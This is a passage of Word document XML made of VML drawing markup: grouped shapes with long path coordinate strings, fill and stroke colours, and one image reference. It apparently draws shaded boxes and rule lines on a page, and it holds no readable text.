380,6602,2380,6471,2380,6337,2380,6201,2380,6061,2380,5918,2380,5773,2380,5624,2380,5472,2380,5317,2380,5159,2380,4997,2380,4833,2380,4665,2380,4494,2380,4319,2380,4141,2380,3960,2380,3776,2380,3587,2380,3396,2380,3201,2380,3002,2380,2800,2380,2594,2380,2385,2380,2172,2380,1955,2380,1734,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2379,1510,2379,1510,2379,1510,2379,1510,2379,1510,2378,1510,2378,1510,2378,1510,2377,1510,2377,1510,2377,1510,2376,1510,2376,1510,2375,1510,2375,1510,2374,1510,2374,1510,2373,1510,2372,1510,2371,1510,2371,1510,2370,1510,2369,1510,2368,1510,2367,1510,2366,1510,2365,1510,2364,1510,2362,1510,2361,1510,2360,1510,2359,1510,2357,1510,2356,1510,2354,1510,2352,1510,2351,1510,2349,1510,2347,1510,2345,1510,2343,1510,2341,1510,2339,1510,2337,1510,2334,1510,2332,1510,2330,1510,2327,1510,2325,1510,2322,1510,2319,1510,2316,1510,2313,1510,2310,1510,2307,1510,2304,1510,2301,1510,2297,1510,2294,1510,2290,1510,2286,1510,2282,1510,2279,1510,2275,1510,2270,1510,2266,1510,2262,1510,2257,1510,2253,1510,2248,1510,2243,1510,2239,1510,2234,1510,2228,1510,2223,1510,2218,1510,2212,1510,2207,1510,2201,1510,2195,1510,2189,1510,2183,1510,2177,1510,2171,1510,2164,1510,2158,1510,2151,1510,2144,1510,2137,1510,2130,1510,2122,1510,2115,1510,2107,1510,2100,1510,2092,1510,2084,1510,2076,1510,2067,1510,2059,1510,2050,1510,2042,1510,2033,1510,2024,1510,2014,1510,2005e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:1990;width:30;height:390" coordorigin="1490,1990" coordsize="30,390" path="m1517,2005l1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2006,1517,2006,1517,2006,1517,2006,1517,2006,1517,2007,1517,2007,1517,2007,1517,2007,1517,2008,1517,2008,1517,2008,1517,2009,1517,2009,1517,2010,1517,2010,1517,2011,1517,2012,1517,2012,1517,2013,1517,2014,1517,2015,1517,2015,1517,2016,1517,2017,1517,2018,1517,2019,1517,2020,1517,2022,1517,2023,1517,2024,1517,2025,1517,2027,1517,2028,1517,2030,1517,2031,1517,2033,1517,2035,1517,2036,1517,2038,1517,2040,1517,2042,1517,2044,1517,2046,1517,2048,1517,2051,1517,2053,1517,2056,1517,2058,1517,2061,1517,2063,1517,2066,1517,2069,1517,2072,1517,2075,1517,2078,1517,2081,1517,2085,1517,2088,1517,2092,1517,2095,1517,2099,1517,2103,1517,2107,1517,2111,1517,2115,1517,2119,1517,2123,1517,2128,1517,2132,1517,2137,1517,2142,1517,2147,1517,2152,1517,2157,1517,2162,1517,2167,1517,2173,1517,2178,1517,2184,1517,2190,1517,2196,1517,2202,1517,2208,1517,2215,1517,2221,1517,2228,1517,2234,1517,2241,1517,2248,1517,2255,1517,2263,1517,2270,1517,2278,1517,2285,1517,2293,1517,2301,1517,2310,1517,2318,1517,2326,1517,2335,1517,2344,1517,2353,1517,2362,1517,2371,1517,2380e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:118.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2370" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2370;width:8990;height:370" coordorigin="1490,2370" coordsize="8990,370" path="m1510,2380l1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1510,2380,1511,2380,1512,2380,1512,2380,1514,2380,1515,2380,1517,2380,1519,2380,1521,2380,1524,2380,1528,2380,1532,2380,1536,2380,1541,2380,1546,2380,1552,2380,1559,2380,1566,2380,1575,2380,1583,2380,1593,2380,1603,2380,1615,2380,1627,2380,1640,2380,1654,2380,1668,2380,1684,2380,1701,2380,1719,2380,1738,2380,1758,2380,1780,2380,1802,2380,1826,2380,1851,2380,1877,2380,1904,2380,1933,2380,1963,2380,1995,2380,2028,2380,2063,2380,2099,2380,2136,2380,2175,2380,2216,2380,2259,2380,2303,2380,2348,2380,2396,2380,2445,2380,2496,2380,2549,2380,2604,2380,2660,2380,2719,2380,2779,2380,2841,2380,2906,2380,2972,2380,3041,2380,3112,2380,3184,2380,3259,2380,3336,2380,3416,2380,3498,2380,3582,2380,3668,2380,3757,2380,3848,2380,3941,2380,4037,2380,4136,2380,4236,2380,4340,2380,4446,2380,4555,2380,4666,2380,4780,2380,4897,2380,5017,2380,5139,2380,5264,2380,5392,2380,5523,2380,5657,2380,5793,2380,5933,2380,6076,2380,6222,2380,6370,2380,6522,2380,6677,2380,6835,2380,6997,2380,7161,2380,7329,2380,7500,2380,7675,2380,7853,2380,8034,2380,8219,2380,8407,2380,8598,2380,8793,2380,8992,2380,9194,2380,9400,2380,9609,2380,9823,2380,10039,2380,10260,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2381,10484,2381,10484,2381,10484,2381,10484,2381,10484,2381,10484,2381,10484,2382,10484,2382,10484,2382,10484,2382,10484,2383,10484,2383,10484,2384,10484,2384,10484,2384,10484,2385,10484,2385,10484,2386,10484,2387,10484,2387,10484,2388,10484,2389,10484,2389,10484,2390,10484,2391,10484,2392,10484,2393,10484,2394,10484,2395,10484,2396,10484,2397,10484,2398,10484,2400,10484,2401,10484,2402,10484,2404,10484,2405,10484,2407,10484,2409,10484,2410,10484,2412,10484,2414,10484,2416,10484,2418,10484,2420,10484,2422,10484,2424,10484,2426,10484,2429,10484,2431,10484,2434,10484,2436,10484,2439,10484,2442,10484,2444,10484,2447,10484,2450,10484,2454,10484,2457,10484,2460,10484,2463,10484,2467,10484,2470,10484,2474,10484,2478,10484,2482,10484,2486,10484,2490,10484,2494,10484,2498,10484,2502,10484,2507,10484,2511,10484,2516,10484,2521,10484,2526,10484,2531,10484,2536,10484,2541,10484,2547,10484,2552,10484,2558,10484,2563,10484,2569,10484,2575,10484,2581,10484,2588,10484,2594,10484,2600,10484,2607,10484,2614,10484,2621,10484,2628,10484,2635,10484,2642,10484,2649,10484,2657,10484,2665,10484,2673,10484,2680,10484,2689,10484,2697,10484,2705,10484,2714,10484,2723,10484,2731,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10483,2740,10482,2740,10482,2740,10480,2740,10479,2740,10477,2740,10475,2740,10473,2740,10470,2740,10466,2740,10462,2740,10458,2740,10453,2740,10448,2740,10442,2740,10435,2740,10428,2740,10419,2740,10411,2740,10401,2740,10391,2740,10379,2740,10367,2740,10354,2740,10340,2740,10326,2740,10310,2740,10293,2740,10275,2740,10256,2740,10236,2740,10215,2740,10192,2740,10168,2740,10143,2740,10117,2740,10090,2740,10061,2740,10031,2740,9999,2740,9966,2740,9931,2740,9895,2740,9858,2740,9819,2740,9778,2740,9735,2740,9691,2740,9646,2740,9598,2740,9549,2740,9498,2740,9445,2740,9391,2740,9334,2740,9275,2740,9215,2740,9153,2740,9088,2740,9022,2740,8953,2740,8883,2740,8810,2740,8735,2740,8658,2740,8578,2740,8497,2740,8413,2740,8326,2740,8238,2740,8146,2740,8053,2740,7957,2740,7859,2740,7758,2740,7654,2740,7548,2740,7439,2740,7328,2740,7214,2740,7097,2740,6977,2740,6855,2740,6730,2740,6602,2740,6471,2740,6337,2740,6201,2740,6061,2740,5918,2740,5773,2740,5624,2740,5472,2740,5317,2740,5159,2740,4997,2740,4833,2740,4665,2740,4494,2740,4319,2740,4141,2740,3960,2740,3776,2740,3587,2740,3396,2740,3201,2740,3002,2740,2800,2740,2594,2740,2385,2740,2172,2740,1955,2740,1734,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2739,1510,2739,1510,2739,1510,2739,1510,2738,1510,2738,1510,2738,1510,2737,1510,2737,1510,2737,1510,2736,1510,2736,1510,2735,1510,2735,1510,2734,1510,2733,1510,2733,1510,2732,1510,2731,1510,2730,1510,2730,1510,2729,1510,2728,1510,2727,1510,2726,1510,2725,1510,2723,1510,2722,1510,2721,1510,2720,1510,2718,1510,2717,1510,2715,1510,2714,1510,2712,1510,2710,1510,2709,1510,2707,1510,2705,1510,2703,1510,2701,1510,2699,1510,2696,1510,2694,1510,2692,1510,2689,1510,2687,1510,2684,1510,2682,1510,2679,1510,2676,1510,2673,1510,2670,1510,2667,1510,2664,1510,2661,1510,2657,1510,2654,1510,2650,1510,2647,1510,2643,1510,2639,1510,2635,1510,2631,1510,2627,1510,2623,1510,2618,1510,2614,1510,2609,1510,2604,1510,2600,1510,2595,1510,2590,1510,2585,1510,2579,1510,2574,1510,2568,1510,2563,1510,2557,1510,2551,1510,2545,1510,2539,1510,2533,1510,2527,1510,2520,1510,2514,1510,2507,1510,2500,1510,2493,1510,2486,1510,2479,1510,2471,1510,2464,1510,2456,1510,2448,1510,2440,1510,2432,1510,2424,1510,2415,1510,2407,1510,2398,1510,2389,1510,2380e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:118.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2370" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2370;width:30;height:370" coordorigin="1490,2370" coordsize="30,370" path="m1517,2380l1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2380,1517,2381,1517,2381,1517,2381,1517,2381,1517,2381,1517,2381,1517,2381,1517,2382,1517,2382,1517,2382,1517,2382,1517,2383,1517,2383,1517,2384,1517,2384,1517,2384,1517,2385,1517,2385,1517,2386,1517,2387,1517,2387,1517,2388,1517,2389,1517,2389,1517,2390,1517,2391,1517,2392,1517,2393,1517,2394,1517,2395,1517,2396,1517,2397,1517,2398,1517,2400,1517,2401,1517,2402,1517,2404,1517,2405,1517,2407,1517,2409,1517,2410,1517,2412,1517,2414,1517,2416,1517,2418,1517,2420,1517,2422,1517,2424,1517,2426,1517,2429,1517,2431,1517,2434,1517,2436,1517,2439,1517,2442,1517,2444,1517,2447,1517,2450,1517,2454,1517,2457,1517,2460,1517,2463,1517,2467,1517,2470,1517,2474,1517,2478,1517,2482,1517,2486,1517,2490,1517,2494,1517,2498,1517,2502,1517,2507,1517,2511,1517,2516,1517,2521,1517,2526,1517,2531,1517,2536,1517,2541,1517,2547,1517,2552,1517,2558,1517,2563,1517,2569,1517,2575,1517,2581,1517,2588,1517,2594,1517,2600,1517,2607,1517,2614,1517,2621,1517,2628,1517,2635,1517,2642,1517,2649,1517,2657,1517,2665,1517,2673,1517,2680,1517,2689,1517,2697,1517,2705,1517,2714,1517,2723,1517,2731,1517,2740e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:136.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2730" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:2730;width:8990;height:390" coordorigin="1490,2730" coordsize="8990,390" path="m1510,2740l1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1510,2740,1511,2740,1512,2740,1512,2740,1514,2740,1515,2740,1517,2740,1519,2740,1521,2740,1524,2740,1528,2740,1532,2740,1536,2740,1541,2740,1546,2740,1552,2740,1559,2740,1566,2740,1575,2740,1583,2740,1593,2740,1603,2740,1615,2740,1627,2740,1640,2740,1654,2740,1668,2740,1684,2740,1701,2740,1719,2740,1738,2740,1758,2740,1780,2740,1802,2740,1826,2740,1851,2740,1877,2740,1904,2740,1933,2740,1963,2740,1995,2740,2028,2740,2063,2740,2099,2740,2136,2740,2175,2740,2216,2740,2259,2740,2303,2740,2348,2740,2396,2740,2445,2740,2496,2740,2549,2740,2604,2740,2660,2740,2719,2740,2779,2740,2841,2740,2906,2740,2972,2740,3041,2740,3112,2740,3184,2740,3259,2740,3336,2740,3416,2740,3498,2740,3582,2740,3668,2740,3757,2740,3848,2740,3941,2740,4037,2740,4136,2740,4236,2740,4340,2740,4446,2740,4555,2740,4666,2740,4780,2740,4897,2740,5017,2740,5139,2740,5264,2740,5392,2740,5523,2740,5657,2740,5793,2740,5933,2740,6076,2740,6222,2740,6370,2740,6522,2740,6677,2740,6835,2740,6997,2740,7161,2740,7329,2740,7500,2740,7675,2740,7853,2740,8034,2740,8219,2740,8407,2740,8598,2740,8793,2740,8992,2740,9194,2740,9400,2740,9609,2740,9823,2740,10039,2740,10260,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2740,10484,2741,10484,2741,10484,2741,10484,2741,10484,2741,10484,2741,10484,2741,10484,2741,10484,2742,10484,2742,10484,2742,10484,2742,10484,2743,10484,2743,10484,2743,10484,2744,10484,2744,10484,2744,10484,2745,10484,2745,10484,2746,10484,2747,10484,2747,10484,2748,10484,2749,10484,2749,10484,2750,10484,2751,10484,2752,10484,2753,10484,2754,10484,2755,10484,2756,10484,2758,10484,2759,10484,2760,10484,2761,10484,2763,10484,2764,10484,2766,10484,2768,10484,2769,10484,2771,10484,2773,10484,2775,10484,2777,10484,2779,10484,2781,10484,2783,10484,2786,10484,2788,10484,2790,10484,2793,10484,2796,10484,2798,10484,2801,10484,2804,10484,2807,10484,2810,10484,2813,10484,2816,10484,2820,10484,2823,10484,2827,10484,2830,10484,2834,10484,2838,10484,2842,10484,2846,10484,2850,10484,2855,10484,2859,10484,2863,10484,2868,10484,2873,10484,2878,10484,2883,10484,2888,10484,2893,10484,2898,10484,2904,10484,2909,10484,2915,10484,2921,10484,2927,10484,2933,10484,2939,10484,2945,10484,2952,10484,2958,10484,2965,10484,2972,10484,2979,10484,2986,10484,2993,10484,3001,10484,3008,10484,3016,10484,3024,10484,3032,10484,3040,10484,3049,10484,3057,10484,3066,10484,3074,10484,3083,10484,3093,10484,3102,10484,3111,10484,3121,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10483,3131,10482,3131,10482,3131,10480,3131,10479,3131,10477,3131,10475,3131,10473,3131,10470,3131,10466,3131,10462,3131,10458,3131,10453,3131,10448,3131,10442,3131,10435,3131,10428,3131,10419,3131,10411,3131,10401,3131,10391,3131,10379,3131,10367,3131,10354,3131,10340,3131,10326,3131,10310,3131,10293,3131,10275,3131,10256,3131,10236,3131,10215,3131,10192,3131,10168,3131,10143,3131,10117,3131,10090,3131,10061,3131,10031,3131,9999,3131,9966,3131,9931,3131,9895,3131,9858,3131,9819,3131,9778,3131,9735,3131,9691,3131,9646,3131,9598,3131,9549,3131,9498,3131,9445,3131,9391,3131,9334,3131,9275,3131,9215,3131,9153,3131,9088,3131,9022,3131,8953,3131,8883,3131,8810,3131,8735,3131,8658,3131,8578,3131,8497,3131,8413,3131,8326,3131,8238,3131,8146,3131,8053,3131,7957,3131,7859,3131,7758,3131,7654,3131,7548,3131,7439,3131,7328,3131,7214,3131,7097,3131,6977,3131,6855,3131,6730,3131,6602,3131,6471,3131,6337,3131,6201,3131,6061,3131,5918,3131,5773,3131,5624,3131,5472,3131,5317,3131,5159,3131,4997,3131,4833,3131,4665,3131,4494,3131,4319,3131,4141,3131,3960,3131,3776,3131,3587,3131,3396,3131,3201,3131,3002,3131,2800,3131,2594,3131,2385,3131,2172,3131,1955,3131,1734,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3129,1510,3129,1510,3129,1510,3129,1510,3128,1510,3128,1510,3128,1510,3127,1510,3127,1510,3127,1510,3126,1510,3125,1510,3125,1510,3124,1510,3124,1510,3123,1510,3122,1510,3121,1510,3121,1510,3120,1510,3119,1510,3118,1510,3117,1510,3116,1510,3115,1510,3113,1510,3112,1510,3111,1510,3109,1510,3108,1510,3107,1510,3105,1510,3103,1510,3102,1510,3100,1510,3098,1510,3096,1510,3094,1510,3092,1510,3090,1510,3088,1510,3085,1510,3083,1510,3081,1510,3078,1510,3075,1510,3073,1510,3070,1510,3067,1510,3064,1510,3061,1510,3058,1510,3055,1510,3051,1510,3048,1510,3044,1510,3041,1510,3037,1510,3033,1510,3029,1510,3025,1510,3021,1510,3016,1510,3012,1510,3008,1510,3003,1510,2998,1510,2993,1510,2988,1510,2983,1510,2978,1510,2973,1510,2967,1510,2962,1510,2956,1510,2950,1510,2944,1510,2938,1510,2932,1510,2926,1510,2919,1510,2913,1510,2906,1510,2899,1510,2892,1510,2885,1510,2878,1510,2870,1510,2863,1510,2855,1510,2847,1510,2839,1510,2831,1510,2822,1510,2814,1510,2805,1510,2796,1510,2788,1510,2778,1510,2769,1510,2760,1510,2750,1510,2740e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:155.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3110" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:3110;width:8990;height:10" coordorigin="1490,3110" coordsize="8990,10" path="m1510,3123l1510,3123,1510,3123,1510,3123,1510,3123,1510,3123,1510,3123,1511,3123,1512,3123,1512,3123,1514,3123,1515,3123,1517,3123,1519,3123,1521,3123,1524,3123,1528,3123,1532,3123,1536,3123,1541,3123,1546,3123,1552,3123,1559,3123,1566,3123,1575,3123,1583,3123,1593,3123,1603,3123,1615,3123,1627,3123,1640,3123,1654,3123,1668,3123,1684,3123,1701,3123,1719,3123,1738,3123,1758,3123,1780,3123,1802,3123,1826,3123,1851,3123,1877,3123,1904,3123,1933,3123,1963,3123,1995,3123,2028,3123,2063,3123,2099,3123,2136,3123,2175,3123,2216,3123,2259,3123,2303,3123,2348,3123,2396,3123,2445,3123,2496,3123,2549,3123,2604,3123,2660,3123,2719,3123,2779,3123,2841,3123,2906,3123,2972,3123,3041,3123,3112,3123,3184,3123,3259,3123,3336,3123,3416,3123,3498,3123,3582,3123,3668,3123,3757,3123,3848,3123,3941,3123,4037,3123,4136,3123,4236,3123,4340,3123,4446,3123,4555,3123,4666,3123,4780,3123,4897,3123,5017,3123,5139,3123,5264,3123,5392,3123,5523,3123,5657,3123,5793,3123,5933,3123,6076,3123,6222,3123,6370,3123,6522,3123,6677,3123,6835,3123,6997,3123,7161,3123,7329,3123,7500,3123,7675,3123,7853,3123,8034,3123,8219,3123,8407,3123,8598,3123,8793,3123,8992,3123,9194,3123,9400,3123,9609,3123,9823,3123,10039,3123,10260,3123,10484,3123e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:135.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId40" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:1030;width:130;height:270" coordorigin="4710,1030" coordsize="130,270" path="m4736,1045l4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4736,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4737,1045,4738,1045,4738,1045,4738,1045,4738,1045,4738,1045,4739,1045,4739,1045,4739,1045,4739,1045,4739,1045,4740,1045,4740,1045,4740,1045,4741,1045,4741,1045,4741,1045,4742,1045,4742,1045,4742,1045,4743,1045,4743,1045,4744,1045,4744,1045,4745,1045,4745,1045,4746,1045,4746,1045,4747,1045,4748,1045,4748,1045,4749,1045,4750,1045,4750,1045,4751,1045,4752,1045,4753,1045,4753,1045,4754,1045,4755,1045,4756,1045,4757,1045,4758,1045,4759,1045,4760,1045,4761,1045,4762,1045,4763,1045,4764,1045,4765,1045,4766,1045,4768,1045,4769,1045,4770,1045,4772,1045,4773,1045,4774,1045,4776,1045,4777,1045,4779,1045,4780,1045,4782,1045,4783,1045,4785,1045,4787,1045,4788,1045,4790,1045,4792,1045,4794,1045,4796,1045,4797,1045,4799,1045,4801,1045,4803,1045,4806,1045,4808,1045,4810,1045,4812,1045,4814,1045,4817,1045,4819,1045,4821,1045,4824,1045,4826,1045,4829,1045,4831,1045,4834,1045,4836,1045,4839,1045,4842,1045,4845,1045,4848,1045,4850,1045,4853,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1045,4856,1046,4856,1046,4856,1046,4856,1046,4856,1046,4856,1047,4856,1047,4856,1047,4856,1048,4856,1048,4856,1048,4856,1049,4856,1049,4856,1049,4856,1050,4856,1050,4856,1051,4856,1052,4856,1052,4856,1053,4856,1054,4856,1054,4856,1055,4856,1056,4856,1057,4856,1057,4856,1058,4856,1059,4856,1060,4856,1061,4856,1062,4856,1063,4856,1065,4856,1066,4856,1067,4856,1068,4856,1070,4856,1071,4856,1073,4856,1074,4856,1076,4856,1077,4856,1079,4856,1081,4856,1082,4856,1084,4856,1086,4856,1088,4856,1090,4856,1092,4856,1094,4856,1096,4856,1099,4856,1101,4856,1103,4856,1106,4856,1108,4856,1111,4856,1114,4856,1116,4856,1119,4856,1122,4856,1125,4856,1128,4856,1131,4856,1134,4856,1138,4856,1141,4856,1144,4856,1148,4856,1151,4856,1155,4856,1159,4856,1162,4856,1166,4856,1170,4856,1174,4856,1178,4856,1183,4856,1187,4856,1191,4856,1196,4856,1201,4856,1205,4856,1210,4856,1215,4856,1220,4856,1225,4856,1230,4856,1235,4856,1241,4856,1246,4856,1252,4856,1257,4856,1263,4856,1269,4856,1275,4856,1281,4856,1287,4856,1293,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4856,1300,4855,1300,4855,1300,4855,1300,4855,1300,4855,1300,4855,1300,4855,1300,4854,1300,4854,1300,4854,1300,4854,1300,4853,1300,4853,1300,4853,1300,4853,1300,4852,1300,4852,1300,4852,1300,4851,1300,4851,1300,4850,1300,4850,1300,4850,1300,4849,1300,4849,1300,4848,1300,4848,1300,4847,1300,4846,1300,4846,1300,4845,1300,4845,1300,4844,1300,4843,1300,4843,1300,4842,1300,4841,1300,4840,1300,4839,1300,4839,1300,4838,1300,4837,1300,4836,1300,4835,1300,4834,1300,4833,1300,4832,1300,4831,1300,4830,1300,4829,1300,4828,1300,4826,1300,4825,1300,4824,1300,4823,1300,4821,1300,4820,1300,4819,1300,4817,1300,4816,1300,4814,1300,4813,1300,4811,1300,4810,1300,4808,1300,4806,1300,4805,1300,4803,1300,4801,1300,4799,1300,4797,1300,4795,1300,4793,1300,4791,1300,4789,1300,4787,1300,4785,1300,4783,1300,4781,1300,4779,1300,4776,1300,4774,1300,4772,1300,4769,1300,4767,1300,4764,1300,4762,1300,4759,1300,4756,1300,4754,1300,4751,1300,4748,1300,4745,1300,4742,1300,4739,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1300,4736,1299,4736,1299,4736,1299,4736,1299,4736,1299,4736,1299,4736,1299,4736,1299,4736,1299,4736,1298,4736,1298,4736,1298,4736,1298,4736,1298,4736,1297,4736,1297,4736,1297,4736,1296,4736,1296,4736,1296,4736,1295,4736,1295,4736,1294,4736,1294,4736,1293,4736,1293,4736,1292,4736,1291,4736,1291,4736,1290,4736,1289,4736,1288,4736,1288,4736,1287,4736,1286,4736,1285,4736,1284,4736,1283,4736,1282,4736,1281,4736,1280,4736,1278,4736,1277,4736,1276,4736,1274,4736,1273,4736,1272,4736,1270,4736,1269,4736,1267,4736,1265,4736,1264,4736,1262,4736,1260,4736,1258,4736,1256,4736,1254,4736,1252,4736,1250,4736,1248,4736,1245,4736,1243,4736,1241,4736,1238,4736,1236,4736,1233,4736,1231,4736,1228,4736,1225,4736,1222,4736,1219,4736,1216,4736,1213,4736,1210,4736,1207,4736,1203,4736,1200,4736,1196,4736,1193,4736,1189,4736,1186,4736,1182,4736,1178,4736,1174,4736,1170,4736,1166,4736,1161,4736,1157,4736,1153,4736,1148,4736,1144,4736,1139,4736,1134,4736,1129,4736,1124,4736,1119,4736,1114,4736,1109,4736,1104,4736,1098,4736,1093,4736,1087,4736,1081,4736,1075,4736,1069,4736,1063,4736,1057,4736,1051,4736,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:51.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,1030" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:1030;width:130;height:270" coordorigin="6390,1030" coordsize="130,270" path="m6417,1045l6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6417,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6418,1045,6419,1045,6419,1045,6419,1045,6419,1045,6419,1045,6420,1045,6420,1045,6420,1045,6420,1045,6421,1045,6421,1045,6421,1045,6421,1045,6422,1045,6422,1045,6423,1045,6423,1045,6423,1045,6424,1045,6424,1045,6425,1045,6425,1045,6426,1045,6426,1045,6427,1045,6427,1045,6428,1045,6428,1045,6429,1045,6430,1045,6430,1045,6431,1045,6432,1045,6433,1045,6433,1045,6434,1045,6435,1045,6436,1045,6437,1045,6438,1045,6439,1045,6440,1045,6441,1045,6442,1045,6443,1045,6444,1045,6445,1045,6446,1045,6447,1045,6449,1045,6450,1045,6451,1045,6452,1045,6454,1045,6455,1045,6457,1045,6458,1045,6459,1045,6461,1045,6463,1045,6464,1045,6466,1045,6467,1045,6469,1045,6471,1045,6473,1045,6475,1045,6476,1045,6478,1045,6480,1045,6482,1045,6484,1045,6486,1045,6488,1045,6491,1045,6493,1045,6495,1045,6497,1045,6500,1045,6502,1045,6505,1045,6507,1045,6509,1045,6512,1045,6515,1045,6517,1045,6520,1045,6523,1045,6526,1045,6528,1045,6531,1045,6534,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1045,6537,1046,6537,1046,6537,1046,6537,1046,6537,1046,6537,1047,6537,1047,6537,1047,6537,1048,6537,1048,6537,1048,6537,1049,6537,1049,6537,1049,6537,1050,6537,1050,6537,1051,6537,1052,6537,1052,6537,1053,6537,1054,6537,1054,6537,1055,6537,1056,6537,1057,6537,1057,6537,1058,6537,1059,6537,1060,6537,1061,6537,1062,6537,1063,6537,1065,6537,1066,6537,1067,6537,1068,6537,1070,6537,1071,6537,1073,6537,1074,6537,1076,6537,1077,6537,1079,6537,1081,6537,1082,6537,1084,6537,1086,6537,1088,6537,1090,6537,1092,6537,1094,6537,1096,6537,1099,6537,1101,6537,1103,6537,1106,6537,1108,6537,1111,6537,1114,6537,1116,6537,1119,6537,1122,6537,1125,6537,1128,6537,1131,6537,1134,6537,1138,6537,1141,6537,1144,6537,1148,6537,1151,6537,1155,6537,1159,6537,1162,6537,1166,6537,1170,6537,1174,6537,1178,6537,1183,6537,1187,6537,1191,6537,1196,6537,1201,6537,1205,6537,1210,6537,1215,6537,1220,6537,1225,6537,1230,6537,1235,6537,1241,6537,1246,6537,1252,6537,1257,6537,1263,6537,1269,6537,1275